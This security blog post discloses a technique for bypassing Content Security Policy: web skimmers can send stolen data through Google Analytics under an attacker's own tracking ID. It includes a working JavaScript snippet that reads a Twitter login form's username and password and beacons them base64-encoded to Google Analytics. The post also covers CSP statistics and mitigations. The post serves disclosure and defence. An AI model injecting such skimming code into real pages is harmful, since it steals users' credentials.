Tech & Engineering Blog

Exfiltrating User’s Private Data Using Google Analytics to Bypass CSP

An Open Window to Exfiltrate Data

CSP can define a list of domains that the browser should be allowed to interact with for the visited URL. Designed to guard against XSS attacks, CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with. It even can restrict forms to be sent only to specific hosts, using the form-action directive. These restrictions are specified by a list of allowed URIs. Unfortunately, the path matching algorithm used ignores query strings.

As is often the case, an embedded third-party service that identifies its user’s account using a query string can’t be restricted to a given account. By analyzing field data we see a gap in the implementation of CSP, and even for sites that do use it correctly, this creates an open window to exfiltrate data. Our demonstration shows how using the Google Analytics API, a web skimmer can send data to be collected in his own account instance. As Google Analytics is allowed in the CSP configuration of many major sites, this demo shows how an attacker can bypass this security protection and steal data.

CSP Usage Statistics

Our gathered field data shows the following statistics on CSP usage across the Internet (based on HTTPArchive March 2020 scan):

Looking at the top 3M domains, only 210K use CSP. Out of these:

  1. 17K allow google-analytics domain (inc. all variations)
  2. Most don’t even do much besides

    1. upgrade-insecure-requests
    2. frame-ancestors
    3. frame-src
    4. block-all-mixed-content

Since the most common allowed domain is google-analytics.com (17K websites) it was the natural candidate to test our theory. So let’s dive in and see what can be done with that.

Demo of the Attack

In our demonstration, using a simple mechanism, we can leak data over commonly allowed third-party domains. We took google-analytics as an example, but other services can also be used.

As an example, we took the twitter login page, which implemented the following CSP rule (which contains https://www.google-analytics.com):

Image 16

The following short JS code inserted into the site will send the credentials to google-analytics console controlled by us:

username = document.getElementsByName("session[username_or_email]");
password = document.getElementsByName('session[password]');
window.addEventListener("unload", function logData() {
       navigator.sendBeacon("https://www.google-analytics.com/collect",
       'v=1&t=pageview&tid=UA-#######-#&cid=555&dh=perimeterx.com&dp=%2F'+
       btoa(username.item(0).value +':'+ password.item(0).value) +'&dt=homepage');
});

The UA-#######-# parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account. Instead of using twitter’s google-analytic account, we used an account we control. Unfortunately, the CSP policy can’t discriminate based on the Tag ID. This will allow the dp parameter to be sent to our account. Though Google meant to have this parameter be used to mention the page the user visited, we used it to exfiltrate the user name and password data encoded in base64.

In our Google Analytics platform, we will see the data as:

Image 17

In our demo the DP will result in page view of bmV3ZW1haWxAcGVyaW1ldGVyeC5jb206bmV3cGFzcw== Which will be decoded from base64 as: "newemail@perimeterx.com:newpass"

The source of the problem is that the CSP rule system isn’t granular enough. Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data (in this case the user’s email address and password).

One might think we could have updated the CSP to only allow specific TIDs: 'connect-src https://www.google-analytics.com/r/collect?*tid=[SPECIFIC_ACCOUNT]'.

The problem is that CSP doesn't support query strings (See Spec):

Note: Query strings have no impact on matching: the source expression example.com/file matches all of https://example.com/file, https://example.com/file?key=value, https://example.com/file?key=notvalue, and https://example.com/file?notkey=notvalue.

Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts.

Strengthening CSPs

A possible solution would come from adaptive URLs, adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts.

A more granular future direction for strengthening CSP direction to consider as part of the CSP standard is XHR proxy enforcement. This will essentially create a client-side WAF that can enforce a policy on where specific data field are allowed to be transmitted.

While CSP is a useful tool to have in your web security tool belt, it is not foolproof. In addition to the complexity of managing CSP rules, this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection.